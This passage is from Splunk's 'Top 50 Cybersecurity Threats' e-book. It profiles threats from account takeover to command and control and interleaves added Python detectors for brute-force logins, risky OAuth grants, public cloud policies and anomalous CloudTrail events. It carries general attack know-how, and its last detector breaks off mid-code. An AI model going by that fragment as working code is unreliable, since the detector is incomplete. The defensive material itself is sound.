Top 50 Cybersecurity Threats

This document provides a summary of the top 50 cybersecurity threats based on a report from Splunk. It includes threats such as account takeover, advanced persistent threats, Amazon Web Services attacks, application access tokens, brute force attacks, cloud cryptomining, credential stuffing, cryptojacking, DDoS attacks, DNS attacks, insider threats, IoT threats, malware, man-in-the-middle attacks, phishing, ransomware, SQL injection, supply chain attacks, and zero-day exploits. The report emphasizes that security is a data problem and that a data-centric approach using analytics and machine learning is key to strengthening security defenses and cyber resilience against these evolving threats.


Table of Contents

Account Takeover ... 6
Advanced Persistent Threat ... 8
Amazon Web Services (AWS) Attacks ... 10
Application Access Token ... 12
Bill Fraud ... 14
Brute Force Attack ... 16
Business Invoice Fraud ... 18
Cloud Access Management ... 20
Cloud Cryptomining ... 22
Command and Control ... 24
Compromised Credentials ... 26
Credential Dumping ... 28
Credential Reuse Attack ... 30
Credential Stuffing ... 32
Cross-Site Scripting ... 34
Cryptojacking Attack ... 36
Data From Information Repositories ... 38
DDoS Attack ... 40
Disabling Security Tools ... 42
DNS Attacks ... 44
• DNS Amplification ... 44
• DNS Hijacking ... 46
• DNS Tunneling ... 48
DoS Attack ... 50
Drive-by Download Attack ... 52
Insider Threat ... 54
IoT Threats ... 56
IoMT Threats ... 58
Macro Viruses ... 60
Malicious PowerShell ... 62
Man-in-the-Middle Attack ... 64
Masquerade Attack ... 66
Meltdown and Spectre Attack ... 68
Network Sniffing ... 70
Open Redirection ... 72
Pass the Hash ... 74
Phishing ... 76
• Phishing Payloads ... 78
• Spear Phishing ... 80
• Whale Phishing (Whaling) ... 82
Privileged User Compromise ... 84
Ransomware ... 86
Ransomware-as-a-Service ... 88
Router and Infrastructure Security ... 90
Shadow IT ... 92
Simjacking ... 94
Social Engineering Attack ... 96
Spyware ... 98
SQL Injection ... 100
Supply Chain Attack ... 102
Suspicious Cloud Authentication Activities ... 104
Suspicious Cloud Storage Activities ... 106
Suspicious Okta Activity ... 108
Suspicious Zoom Child Processes ... 110
System Misconfiguration ... 112
Typosquatting ... 114
Watering Hole Attack ... 116
Web Session Cookie Theft ... 118
Wire Attack ... 120
Zero-Day Exploit ... 122


Foreword
Now more than ever, cybersecurity is essential to our future — after all, it’s vital to protecting everything we rely on today. From banking and online
commerce, to developing medicine and life-saving vaccines, to simpler things — like keeping our favorite video streaming services running.

Yet in the wake of mass migrations to the cloud and digital transformation, many organizations still haven’t reached the peak of their security operations
because of a few key challenges: an always-evolving threat landscape that pits us against creative and well-funded bad actors; the increasing complexity
of hybrid and multi-cloud environments; security teams bogged down by an endless list of monotonous tasks and time-consuming manual processes;
and data silos caused by the proliferation of tools used inside our organizations, which create inefficiencies and blind spots.

These four challenges add up to a single reality: Security is a data problem. This is why a data-centric approach to security is paramount — arming us with
the right information at the right time, and connecting tools and teams through all the noise and complexity. An analytics-driven solution, drawing upon
end-to-end visibility and powered by machine learning (ML), is key to any organization’s success. These advanced capabilities not only give a complete
picture of your environment, but also move operations away from human intervention and basic diagnostics, towards
an automated and strengthened security defense.

How? By stitching together and contextualizing swathes of highly complex datasets, addressing threats faster
with automated alert triage, investigation and response, and honing in on anomalous behavior thanks to
out-of-the-box ML models and algorithms. All of this helps organizations improve their cyber resilience — the
ability to anticipate and adapt to compromises or attacks on cyber resources — so they can more effectively
automate security operations and safeguard the business, all the while accelerating growth and innovation.

At Splunk, we’re excited by the possibilities that data brings for a better — and more secure — future. But to
get there, we must be prepared. We need to know what we’re up against, including the threats that loom
large. That’s why we’ve put together this book of cybersecurity threats — so you can better identify
the different types of attacks out there, mitigate risk and make your business even stronger.

Gary Steele
Splunk President & CEO

4 Splunk | Top 50 Cybersecurity Threats


It may be quite a while before we fully understand the impact the pandemic years have had on the global information security (InfoSec) landscape. More has happened in this time than many security professionals saw in their entire careers before 2020. The fact is that the challenges we’re facing are bigger than ever.

The “Great Resignation” as well as plain-old burnout may make the task seem more daunting just as the security world needs to attract and retain top talent. Those who haven’t already succumbed are overwhelmed by more alerts than ever. They’re spending too much time on repetitive, manual tasks, which can’t possibly be helping their morale. What’s more, they lack insights into the data they need to understand the greatest threats to your security.

But there is hope. Most security operations platforms have failed to fundamentally address security as a data problem. That is actually where the opportunity lies for security professionals.

The ability to field a resilient cybersecurity response is directly related to the quantity and quality of data collected, analyzed, and implemented in the battle to reduce business risk.

Realizing that the future is uncertain, organizations are investing with resilience in mind, to withstand the latest threats to the business and spring back stronger. In this context, resilience means flexible. Fast. Prepared. Proactive. Resilient organizations have a strong data and technology foundation, allowing them to engage rapidly with whatever comes their way.

Resilient security teams deliver cybersecurity solutions to protect every aspect of the business, unlock innovation and empower the organization. Resilient teams address challenges with data at the center of everything they do. And it shows in the results. Data-centric security operations can reduce the risk of data breach, IP theft and fraud by as much as 70%.

This is where it helps to know what threats to look out for and where this book can help. Based on the research of the Splunk Threat Research Team, we present 50 of the biggest cybersecurity threats — plus a few more — to help security professionals make us all feel more secure.
Account Takeover

Account takeover is considered one of the more harmful ways to access a user’s account. The attacker typically poses as a genuine customer, user or employee, eventually gaining entry to the accounts of the individual they’re impersonating. Scarier yet, user credentials can be sourced from the deep web and matched against e-commerce sites with the help of bots and other automated tools for quick and easy entry.

FitBit even fell victim to this type of attack when hackers exposed log-in details to customers’ FitBit accounts, changing the email they registered with and then calling up customer support with a complaint about the device so that they could get a replacement under their warranty.



Account Takeover

What you need to know:
Rather than stealing the card or credentials outright, account takeover is more surreptitious, allowing the attacker to get as much use out of the stolen card as possible before being flagged for suspicious activity. Banks, major marketplaces and financial services like PayPal are common targets, and any website that requires a login is susceptible to this attack.

How the attack happens:
Some of the most common methods include proxy-based “checker” one-click apps, brute force botnet attacks, phishing and malware. Other methods include dumpster diving to find personal information in discarded mail, and outright buying lists of “Fullz,” a slang term for full packages of identifying information sold on the black market. Once the profile of the victim is purchased or built, an identity thief can use the information to defeat a knowledge-based authentication system.

Where the attack comes from:
An enormous volume of our transactions — financial and otherwise — take place online. For cybercriminals, acquiring account credentials and personal information (like social security numbers, home addresses, phone numbers, credit card numbers and other financial information) is a lucrative business, whether they choose to sell the acquired information or use it for their own gain. As such, these kinds of attacks can originate anywhere in the world.



Advanced Persistent Threat

In one of the most notable data breaches in U.S. history, the attack on the U.S. Office of Personnel Management (OPM), security experts found that state-sponsored attackers used an advanced persistent threat sponsored by the Chinese government.

The attack on OPM compromised over 4 million records, including information on current, former and prospective federal government employees, as well as their family members, foreign contacts and even psychological information.



Advanced Persistent Threat

What you need to know:
An advanced persistent threat (APT) is a highly advanced, covert threat on a computer system or network where an unauthorized user manages to break in, avoid detection and obtain information for business or political motives. Typically carried out by criminals or nation-states, the main objective is financial gain or political espionage. While APTs continue to be associated with nation-state actors who want to steal government or industry secrets, cyber criminals with no particular affiliation also use APTs to steal data or intellectual property.

How the attack happens:
An APT usually ranges from highly advanced tactics, including a fair amount of intelligence-gathering, to less sophisticated methods to get a foothold in the system (e.g., malware and spear phishing). Various methodologies are used to compromise the target and to maintain access.

The most common plan of attack is to escalate from a single computer to an entire network by reading an authentication database, learning which accounts have the appropriate permissions and then leveraging them to compromise assets. APT hackers will also install backdoor programs (like Trojans) on compromised computers within the exploited environment. They do this to make sure they can gain re-entry, even if the credentials are changed later.

Where the attack comes from:
Most APT groups are affiliated with, or are agents of, governments of sovereign states. An APT could also be a professional hacker working full-time for the above. These state-sponsored hacking organizations usually have the resources and ability to closely research their target and determine the best point of entry.



Amazon Web Services (AWS) Attacks

The number of creative attacks on virtual environments has exploded with the rise of cloud computing. And as one of the largest cloud-service providers, Amazon Web Services has certainly had its share of threats.

There are several vulnerabilities that threaten the security of cloud providers. One digital marketing company, for example, didn’t password protect its Amazon S3 bucket when it went out of business. The lapse exposed the data of 306,000 people. The full leak exposed 50,000 files, totaling 32GB of full names, locations, email addresses, phone numbers and hashed passwords, from clients such as Patrón Tequila.



Amazon Web Services (AWS) Attacks

What you need to know:
Amazon’s “shared responsibility” model says AWS is responsible for the environment outside of the virtual machine but the customer is responsible for the security inside of the S3 container.

This means threats that take advantage of vulnerabilities created by misconfigurations and deployment errors have become a bigger problem as companies have adopted cloud technologies rapidly and the organization using AWS is responsible for securing their environment. The problem is there are more threats that AWS customers have to worry about.

How the attack happens:
An attack on an AWS instance can happen in a number of ways. The accelerated shift to the cloud brought on by the global COVID-19 pandemic increased the number of threats for cloud providers.

It’s important to stay vigilant for activities that may be as simple as suspicious behavior inside of an AWS environment. Other activities to look out for are S3 access from unfamiliar locations and by unfamiliar users.

It’s also important to monitor and control who has access to an organization’s AWS infrastructure. Detecting suspicious logins to AWS infrastructure provides a good starting point for investigations. Actions, such as abusive behaviors caused by compromised credentials, can lead to direct monetary costs because users are billed for any EC2 instances created by the attacker.

Where the attack comes from:
Because of the diversity of services being hosted on AWS and the new types of cloud threats being spun up daily, these attacks can virtually come from anywhere and anyone.
Application Access Token

Pawn Storm, an active and aggressive espionage group, uses different strategies to gain information from their targets. One method in particular was to abuse Open Authentication (OAuth) in advanced social engineering schemes, targeting high profile users of free webmail.

The group also set up aggressive credential phishing attacks against the Democratic National Convention (DNC), the Christian Democratic Union of Germany (CDU), the parliament and government of Turkey, the parliament of Montenegro, the World Anti-Doping Agency (WADA), Al Jazeera and many other organizations.

They continue to use several malicious applications that abuse OAuth access tokens to gain access to target email accounts, including Gmail and Yahoo Mail.



Application Access Token

What you need to know:
With an OAuth access token, a hacker can use the user-granted REST API to perform functions such as email searching and contact enumeration. With a cloud-based email service, once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a “refresh” token enabling background access is awarded.

How the attack happens:
Attackers may use application access tokens to bypass the typical authentication process and access restricted accounts, information or services on remote systems. These tokens are typically stolen from users and used in lieu of login credentials.

Where the attack comes from:
Compromised access tokens may be used as an initial step to compromising other services. For example, if a token grants access to a victim’s primary email, the attacker may be able to extend access to all other services that the target subscribes to by triggering forgotten password routines. Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to countermeasures like changing passwords.
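A defender’s counterpart to the token abuse described above, added here as an example (not from the Splunk report): a triage over constructed OAuth consent-grant records that scores grants combining mailbox scopes with a refresh token, and spots tokens still being used long after the user last signed in interactively. The record layout and the scope strings are assumptions; offline_access is the standard OIDC scope that yields a refresh token.

```python
from datetime import date

# Constructed consent-grant records. Scope strings are illustrative rather than
# any one provider's exact names; "offline_access" is the standard OIDC scope
# that yields a refresh token, i.e. the background access the text describes.
SAMPLE_GRANTS = [
    {"app": "Calendar Sync", "publisher_verified": True, "consented_by": "admin",
     "scopes": ["calendars.read", "offline_access"],
     "last_user_signin": date(2024, 3, 1), "last_token_use": date(2024, 3, 1)},
    {"app": "Mail Enhancer Pro", "publisher_verified": False, "consented_by": "user",
     "scopes": ["mail.read", "contacts.read", "offline_access"],
     "last_user_signin": date(2024, 1, 10), "last_token_use": date(2024, 3, 5)},
    {"app": "Doc Viewer", "publisher_verified": False, "consented_by": "user",
     "scopes": ["files.read"],
     "last_user_signin": date(2024, 3, 4), "last_token_use": date(2024, 3, 4)},
]

MAIL_SCOPES = {"mail.read", "mail.readwrite", "mail.send", "contacts.read"}
BACKGROUND_SCOPES = {"offline_access"}


def background_use_gap_days(grant):
    """Days between the user's last interactive sign-in and the app's last
    token use. A large gap means the app acts while the user is absent,
    which is exactly what a refresh token enables."""
    return (grant["last_token_use"] - grant["last_user_signin"]).days


def score_grant(grant, max_gap_days=1):
    """Return (risk level, reasons) for one consent grant."""
    scopes = {s.lower() for s in grant["scopes"]}
    reasons = []
    if scopes & MAIL_SCOPES:
        reasons.append("mailbox or contact access")
    if scopes & BACKGROUND_SCOPES:
        reasons.append("refresh token (background access)")
    if not grant["publisher_verified"]:
        reasons.append("unverified publisher")
    if grant["consented_by"] == "user":
        reasons.append("user consent, not admin-reviewed")
    gap = background_use_gap_days(grant)
    if gap > max_gap_days:
        reasons.append(f"token used {gap} days after last interactive sign-in")
    # Mailbox access that persists in the background is the combination the
    # text warns about: it sidesteps the second factor and survives a
    # password change, so it is rated high regardless of the other factors.
    if scopes & MAIL_SCOPES and scopes & BACKGROUND_SCOPES:
        level = "high"
    elif len(reasons) >= 2:
        level = "medium"
    else:
        level = "low"
    return level, reasons


def triage(grants):
    """Map app name -> (risk level, reasons)."""
    return {g["app"]: score_grant(g) for g in grants}


def revocation_candidates(grants):
    """Apps whose grants should be reviewed for revocation first."""
    return sorted(app for app, (level, _) in triage(grants).items() if level == "high")


if __name__ == "__main__":
    for app, (level, reasons) in triage(SAMPLE_GRANTS).items():
        print(f"{level:6} {app}: {'; '.join(reasons) or 'no concerns'}")
```

Revoking a grant invalidates the refresh token, which is the step a password reset alone does not achieve.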



Bill Fraud

Zelle is a financial service that allows customers to easily send money to friends and family. Yet the very same features that make Zelle so quick and efficient for transferring funds are also being exploited by cyberthieves for monetary gain.

Hackers and scammers use the system to pilfer funds away from consumers in payment fraud schemes, sometimes wiping out entire bank accounts.



Bill Fraud

What you need to know:
Bill fraud — or payment fraud — is any type of bogus or illegal transaction where the cybercriminal will divert funds away from consumers. And these schemes work — according to recent data from the FTC, consumers reported they have lost over $1 billion in fraud complaints from January 2021 through March 2022.

How the attack happens:
This attack tricks a large number of users into repeatedly paying small or reasonable amounts of money so they don’t notice the scam. In this ploy, attackers send fraudulent but authentic-looking bills instructing customers to transfer funds from their accounts.

Knowing that most customers regularly use fee-based digital services, the attackers rely on the fact that their targets may mistakenly assume the fraudulent bill is for a service they actually use. Consumers will then initiate a funds transfer or credit card payment to pay for the phony “bill.”

Where the attack comes from:
Bill fraud organizations originate all over the world, including the U.S. It’s typically sourced to attackers with the resources, bandwidth and technology to create fraudulent bills that look real. Like phishing, bill fraud generally targets a broad, random population of individuals.



Brute Force Attack

In a now-infamous brute force attack, over 90,000 PlayStation and Sony Online Entertainment accounts were compromised in 2011. Hackers attempted countless username and password combinations from an unidentified third party, eventually ransacking members’ accounts for personal information.

The now-discontinued Club Nintendo also fell victim to the same type of attack in 2013, when hackers executed a coordinated attack on over 15 million members, eventually breaking into over 25,000 forum members’ accounts. All compromised accounts were suspended until access had been restored to the rightful owners — but the damage to brand reputation had already been done.



Brute Force Attack

What you need to know:
A brute force attack aims to take personal information, specifically usernames and passwords, by using a trial-and-error approach. This is one of the simplest ways to gain access to an application, server or password-protected account, since the attacker is simply trying combinations of usernames and passwords until they eventually get in (if they ever do; a six-character password has billions of potential combinations).

How the attack happens:
The most basic brute force attack is a dictionary attack, where the attacker systematically works through a dictionary or wordlist — trying each and every entry until they get a hit. They’ll even augment words with symbols and numerals, or use special dictionaries with leaked and/or commonly used passwords. And if time or patience isn’t on their side, automated tools for operating dictionary attacks can make this task much faster and less cumbersome.

Where the attack comes from:
Thanks to the ease and simplicity of a brute force attack, hackers and cyber criminals with little-to-no technical experience can try to gain access to someone’s account. The people behind these campaigns either have enough time or computational power on their side to make it happen.
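The trial-and-error pattern described above (and the credential-matching bots of the Account Takeover section) leaves a distinctive trace in authentication logs. The following is an added example, not from the Splunk report: a sliding-window detector run over constructed log lines that flags guessing bursts per source address and any success that follows one, plus the keyspace arithmetic behind the “billions of combinations” remark. The log format, addresses and user names are invented.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log: "<ISO timestamp> <username> <source IP> <FAIL|SUCCESS>".
# 203.0.113.7 guesses alice's password and gets in on the seventh try;
# 198.51.100.5 is a user who mistypes once; 203.0.113.9 tries five accounts.
SAMPLE_LOG = """\
2024-03-01T10:00:01 alice 203.0.113.7 FAIL
2024-03-01T10:00:02 alice 203.0.113.7 FAIL
2024-03-01T10:00:03 alice 203.0.113.7 FAIL
2024-03-01T10:00:04 alice 203.0.113.7 FAIL
2024-03-01T10:00:05 alice 203.0.113.7 FAIL
2024-03-01T10:00:06 alice 203.0.113.7 FAIL
2024-03-01T10:00:07 alice 203.0.113.7 SUCCESS
2024-03-01T10:00:10 bob 198.51.100.5 FAIL
2024-03-01T10:00:15 bob 198.51.100.5 SUCCESS
2024-03-01T10:01:00 bob 203.0.113.9 FAIL
2024-03-01T10:01:01 carol 203.0.113.9 FAIL
2024-03-01T10:01:02 dave 203.0.113.9 FAIL
2024-03-01T10:01:03 erin 203.0.113.9 FAIL
2024-03-01T10:01:04 frank 203.0.113.9 FAIL
2024-03-01T10:09:00 alice 198.51.100.5 SUCCESS
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (FAIL|SUCCESS)$")


def parse_log(text):
    """Parse log lines into dicts, skipping malformed lines instead of crashing."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts, user, src, result = m.groups()
        events.append({"ts": datetime.fromisoformat(ts), "user": user,
                       "src": src, "result": result})
    return sorted(events, key=lambda e: e["ts"])


def detect_brute_force(events, threshold=5, window_seconds=60):
    """Sliding-window detector keyed on source address.

    A source with >= threshold failures inside the window is a guessing burst.
    A success from that source while the burst is live is flagged as a
    suspected compromise: the trial-and-error found a working pair.
    """
    window = timedelta(seconds=window_seconds)
    recent_fails = defaultdict(deque)  # src -> timestamps of failures in window
    bursts = {}                        # src -> peak failures observed in window
    compromises = []
    for e in events:
        q = recent_fails[e["src"]]
        while q and e["ts"] - q[0] > window:
            q.popleft()                # expire failures outside the window
        if e["result"] == "FAIL":
            q.append(e["ts"])
            if len(q) >= threshold:
                bursts[e["src"]] = max(bursts.get(e["src"], 0), len(q))
        elif len(q) >= threshold:
            compromises.append((e["user"], e["src"], e["ts"].isoformat()))
            q.clear()                  # the burst ended in a success; reset
    return {"bursts": bursts, "suspected_compromises": compromises}


def keyspace(alphabet_size, length):
    """Number of candidate passwords. 62 alphanumerics at length 6 gives
    about 5.7e10, the 'billions of combinations' the text refers to."""
    return alphabet_size ** length


if __name__ == "__main__":
    print(detect_brute_force(parse_log(SAMPLE_LOG)))
    print(keyspace(62, 6))
```

The per-source key catches the spraying source 203.0.113.9 even though no single account sees more than one failure; a per-account lockout alone would miss it.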



Business Invoice Fraud

Even the largest technology firms aren’t immune to invoice fraud. According to an investigation by Fortune Magazine, both Facebook and Google unwittingly fell victim to a massive business invoice fraud scheme. The fraudster, a Lithuanian man known as Evaldas Rimasauskas, created invoices impersonating a large Asian-based manufacturer that frequently did business with the two companies to trick them into paying for bogus computer supplies. Over two years, the fraudster duped the two tech giants into spending tens of millions of dollars. By the time the firms figured out what was going on, Rimasauskas had allegedly stolen more than $100 million.



Business Invoice Fraud

What you need to know:
Business invoice fraud attempts to trick victims into paying out on a fraudulent (but convincing) bill addressed to your organization. In reality, the funds go to imposters mimicking suppliers.

These hackers will often bill a reasonable amount so they don’t draw suspicion. But executing these scams hundreds or thousands of times quickly adds up.

How the attack happens:
In this attack, victims are sent fake invoices attempting to steal money in the hopes that marks aren’t paying attention to their accounts payable processes. Hackers will pick targets based on the size of their business, location and the suppliers used and create phony invoices that appear legitimate. With the hopes that the victim’s accounts payable department is backlogged, they send false invoices with high demands like “90 days past due, pay now!”

Where the attack comes from:
While there are numerous individual scammers pulling off business invoice fraud, many are sourced to fraud rings that have the organization and the resources to research their victim’s banking institution and create a billing experience that feels real. Fraud rings conducting invoice scams can be found all over the world.



Cloud Access Management

Moving to the cloud has countless advantages, from fostering collaboration to allowing employees to work from almost anywhere in the world. The importance of this flexibility was on display when the global COVID-19 pandemic hit.

But switching to a cloud-based service can carry a fair amount of risk — oftentimes due to human error.

Wyze Labs, a company that specializes in low-cost smart home products, experienced this firsthand. An almost-prolific breach occurred at the startup when an employee built a database for user analytics, only to accidentally remove the necessary security protocols. As a result, a database’s worth of customers’ personal information was exposed.



Cloud Access Management

What you need to know:
Managing permissions for your organization has become increasingly important in order to avoid a cloud-based breach. Lax or nonexistent security — and in this case, incorrectly configured security controls — can easily jeopardize the security of your data, exposing your organization to an unnecessary amount of risk, including significant damage to brand reputation.

How the attack happens:
This attack usually happens because of poor communication, lack of protocol, insecure default configuration and poor documentation. Once the attacker exploits the vulnerability and gains a foothold in your cloud environment, they can leverage privileges to access other remote entry points, looking for insecure applications and databases, or weak network controls. They can then exfiltrate data while remaining undetected.

Where the attack comes from:
Mismanagement and misconfiguration of a cloud environment isn’t considered a malicious act in and of itself, and as mentioned, typically occurs due to human error.
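The misconfiguration this section describes frequently comes down to a resource policy that grants access to everyone, whether by an insecure default or a control that was removed by mistake. Added example, not from the Splunk report or from Wyze’s configuration: a linter for IAM-format resource policies that flags Allow statements with a public principal (unconditional ones as the serious case) and wildcard actions. The policies, bucket name, VPC endpoint id and account id are constructed placeholders.

```python
import json

# Constructed policies in the IAM resource-policy format. The account id
# 123456789012, the bucket name and "vpce-EXAMPLE" are placeholders.
PUBLIC_BUCKET_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "PublicRead",
        "Effect": "Allow",
        "Principal": "*",
        "Action": ["s3:GetObject", "s3:ListBucket"],
        "Resource": ["arn:aws:s3:::example-analytics-bucket",
                     "arn:aws:s3:::example-analytics-bucket/*"],
    }],
})

VPC_ONLY_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "VpcRead",
        "Effect": "Allow",
        "Principal": {"AWS": "*"},
        "Action": "s3:GetObject",
        "Resource": "arn:aws:s3:::example-analytics-bucket/*",
        # Anonymous principal, but limited to one VPC endpoint: lower severity.
        "Condition": {"StringEquals": {"aws:SourceVpce": "vpce-EXAMPLE"}},
    }],
})

SCOPED_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "ReaderRole", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::123456789012:role/analytics-reader"},
         "Action": "s3:GetObject",
         "Resource": "arn:aws:s3:::example-analytics-bucket/*"},
        {"Sid": "DenyInsecure", "Effect": "Deny", "Principal": "*",
         "Action": "s3:*", "Resource": "arn:aws:s3:::example-analytics-bucket/*",
         "Condition": {"Bool": {"aws:SecureTransport": "false"}}},
    ],
})


def _as_list(value):
    """IAM allows a string or a list in most fields; normalise to a list."""
    return value if isinstance(value, list) else [value]


def is_public_principal(principal):
    """True for the anonymous-principal spellings: "*" or {"AWS": "*"}."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS", []))
    return False


def lint_policy(policy_json):
    """Return (Sid, finding, actions) for each risky Allow statement.

    Deny statements are skipped on purpose: a public-principal Deny such as
    DenyInsecure above is a hardening control, not an exposure.
    """
    findings = []
    statements = _as_list(json.loads(policy_json).get("Statement", []))
    for i, st in enumerate(statements):
        if st.get("Effect") != "Allow":
            continue
        sid = st.get("Sid", f"statement[{i}]")
        actions = _as_list(st.get("Action", []))
        if is_public_principal(st.get("Principal")):
            kind = ("public_principal_conditional" if st.get("Condition")
                    else "public_principal_unconditional")
            findings.append((sid, kind, actions))
        if any(a == "*" or a.endswith(":*") for a in actions):
            findings.append((sid, "wildcard_action", actions))
    return findings


if __name__ == "__main__":
    for name, policy in [("public", PUBLIC_BUCKET_POLICY),
                         ("vpc-only", VPC_ONLY_POLICY), ("scoped", SCOPED_POLICY)]:
        print(name, lint_policy(policy) or "clean")
```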



Cloud Cryptomining

Cloud cryptomining doesn’t need gas to go. Look no further than Tesla for evidence. The electric carmaker fell victim to a cloud cryptomining attack when hackers took advantage of an insecure Kubernetes console, stealing computer processing power from Tesla’s cloud environment to mine for cryptocurrencies.



Cloud Cryptomining

What you need to know:
Cryptomining is an intentionally difficult, resource-intensive business. Its complexity was designed to ensure that the number of blocks mined each day would remain steady. So it’s par for the course that ambitious, yet unscrupulous, miners make amassing the computing power of large enterprises — a practice known as cryptojacking — a top priority.

How the attack happens:
Cryptomining has attracted an increasing amount of media attention since its explosion in popularity in the fall of 2017. The attacks have moved from in-browser exploits and mobile phones to enterprise cloud services, such as Amazon Web Services, Google Cloud Platform (GCP) and Microsoft Azure.

It’s difficult to determine exactly how widespread the practice has become, since hackers continually evolve their ability to evade detection, including employing unlisted endpoints, moderating their CPU usage and hiding the mining pool’s IP address behind a free content delivery network (CDN).

When miners steal a cloud instance, often spinning up hundreds of new instances, the costs can become astronomical for the account holder. So it’s critical to monitor systems for suspicious activities that could indicate that a network has been infiltrated.

Where the attack comes from:
Because cryptocurrency is a global commodity, the attacks can originate from anywhere. Instead of focusing on where the attacks come from, it’s key to monitor cloud computing instances for activities related to cryptojacking and cryptomining, such as new cloud instances that originate from previously unseen regions, users who launch an abnormally high number of instances, or compute instances started by previously unseen users.
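The signals this section and the AWS Attacks section list (S3 access from unfamiliar users or locations, instance launches from previously unseen regions or users, and an abnormally high launch count) can all be checked with one baseline-and-compare pass over CloudTrail records. Added example, not from the Splunk report: the field names eventName, awsRegion and sourceIPAddress follow CloudTrail, while the simplified `user` field, the principals, IP addresses and both event windows are constructed.

```python
from collections import Counter, defaultdict

# CloudTrail-style records, constructed. Real records carry many more fields;
# only the ones the detector uses are kept. BASELINE is a known-good window
# used to learn what "familiar" means; NEW_EVENTS is the window under review.
BASELINE = [
    {"eventName": "GetObject", "user": "alice", "awsRegion": "us-east-1", "sourceIPAddress": "198.51.100.10"},
    {"eventName": "GetObject", "user": "alice", "awsRegion": "us-east-1", "sourceIPAddress": "198.51.100.10"},
    {"eventName": "RunInstances", "user": "deploy-bot", "awsRegion": "us-east-1", "sourceIPAddress": "198.51.100.20"},
    {"eventName": "RunInstances", "user": "deploy-bot", "awsRegion": "us-west-2", "sourceIPAddress": "198.51.100.20"},
]

NEW_EVENTS = [
    {"eventName": "GetObject", "user": "alice", "awsRegion": "us-east-1", "sourceIPAddress": "198.51.100.10"},
    {"eventName": "GetObject", "user": "alice", "awsRegion": "us-east-1", "sourceIPAddress": "203.0.113.44"},
    {"eventName": "ListObjects", "user": "ctr-svc", "awsRegion": "us-east-1", "sourceIPAddress": "203.0.113.44"},
    {"eventName": "RunInstances", "user": "deploy-bot", "awsRegion": "us-east-1", "sourceIPAddress": "198.51.100.20"},
] + [
    # alice's account, never seen launching before, starts six instances in a
    # region the organisation has never used: the cryptojacking pattern above.
    {"eventName": "RunInstances", "user": "alice", "awsRegion": "ap-southeast-1", "sourceIPAddress": "203.0.113.44"},
] * 6

# Simplified selection of S3 data-event names.
S3_DATA_EVENTS = {"GetObject", "PutObject", "ListObjects"}


def build_baseline(events):
    """Learn familiar S3 principals, their source IPs, and EC2 launch users/regions."""
    baseline = {"s3_users": set(), "s3_ips": defaultdict(set),
                "launch_users": set(), "launch_regions": set()}
    for e in events:
        if e["eventName"] in S3_DATA_EVENTS:
            baseline["s3_users"].add(e["user"])
            baseline["s3_ips"][e["user"]].add(e["sourceIPAddress"])
        elif e["eventName"] == "RunInstances":
            baseline["launch_users"].add(e["user"])
            baseline["launch_regions"].add(e["awsRegion"])
    return baseline


def detect(events, baseline, launch_threshold=5):
    """Return deduplicated, sorted (kind, principal, detail) findings plus
    per-user RunInstances counts for the reviewed window."""
    findings = set()
    launches = Counter()
    for e in events:
        name, user = e["eventName"], e["user"]
        if name in S3_DATA_EVENTS:
            if user not in baseline["s3_users"]:
                findings.add(("s3_unfamiliar_user", user, e["sourceIPAddress"]))
            elif e["sourceIPAddress"] not in baseline["s3_ips"][user]:
                findings.add(("s3_unfamiliar_location", user, e["sourceIPAddress"]))
        elif name == "RunInstances":
            launches[user] += 1
            if user not in baseline["launch_users"]:
                findings.add(("launch_by_unseen_user", user, e["awsRegion"]))
            if e["awsRegion"] not in baseline["launch_regions"]:
                findings.add(("launch_in_unseen_region", user, e["awsRegion"]))
    for user, n in launches.items():
        if n >= launch_threshold:
            findings.add(("launch_burst", user, str(n)))
    return {"findings": sorted(findings), "launch_counts": dict(launches)}


if __name__ == "__main__":
    result = detect(NEW_EVENTS, build_baseline(BASELINE))
    for finding in result["findings"]:
        print(*finding)
```

A burst of RunInstances is also the point at which the account holder starts paying for the attacker’s compute, so it is worth alerting on even when the launching user is familiar.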



Command and Control

The first known take down of a country’s power grid from a cyberattack happened on December 23, 2015. The details of the hack are summarized in detail by Wired. At about 3:30 pm local time, a worker inside the Prykarpattyaoblenergo control center saw his mouse’s cursor move across the screen.

The ghostly cursor floated toward the digital controls of the circuit breakers at a substation, and began taking them offline. Almost 30 substations subsequently went down, and 230,000 residents were forced to spend a cold evening in the dark in Western Ukraine, with a blistering low of 30 degrees Fahrenheit.



Command and Control

What you need to know:
A command and control attack is when a hacker takes over a computer in order to send commands or malware to other systems on the network. In some cases, the attacker performs reconnaissance activities, moving laterally across the network to gather sensitive data.

In other attacks, hackers may use this infrastructure to launch actual attacks. One of the most important functions of this infrastructure is to establish servers that will communicate with implants on compromised endpoints. These attacks are also often referred to as C2 or C&C attacks.

How the attack happens:
Most hackers get a foothold in a system by phishing emails then installing malware. This establishes a command and control channel that’s used to proxy data between the compromised endpoint and the attacker. These channels relay commands to the compromised endpoint and the output of those commands back to the attacker.

Since communication is critical, hackers use techniques designed to hide the true nature of their correspondence. They’ll often try to log their activities for as long as possible without being detected, relying on a variety of techniques to communicate over these channels while maintaining a low profile.

Where the attack comes from:
There have been prominent command and control attacks originating from Russia, Iran and even the U.S. These attackers can come from anywhere and everywhere — but they don’t want you to know that.

Top 50 Cybersecurity Threats | Splunk 25
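The C2 channel described above has to check in with the attacker’s server on some schedule, and that regularity is what a defender can look for. The following is an added example, not code from Splunk’s report: it reads a constructed connection log (the Zeek-like CSV format, the thresholds and the IP addresses are all assumptions) and flags outbound flows whose inter-connection intervals and payload sizes are suspiciously uniform, which is how a low-and-slow beacon stands out from bursty human browsing.

```python
"""Detect periodic C2-style beaconing in outbound connection logs.

Added example (not Splunk's code). The log is a constructed Zeek/firewall-like
CSV: ts,src,dst,dst_port,bytes_out. Thresholds are assumptions a SOC would tune.
"""
from collections import defaultdict
from statistics import mean, pstdev

# Constructed sample: one host checks in every ~60 s with near-constant
# payloads (beacon); another host shows irregular, bursty web traffic.
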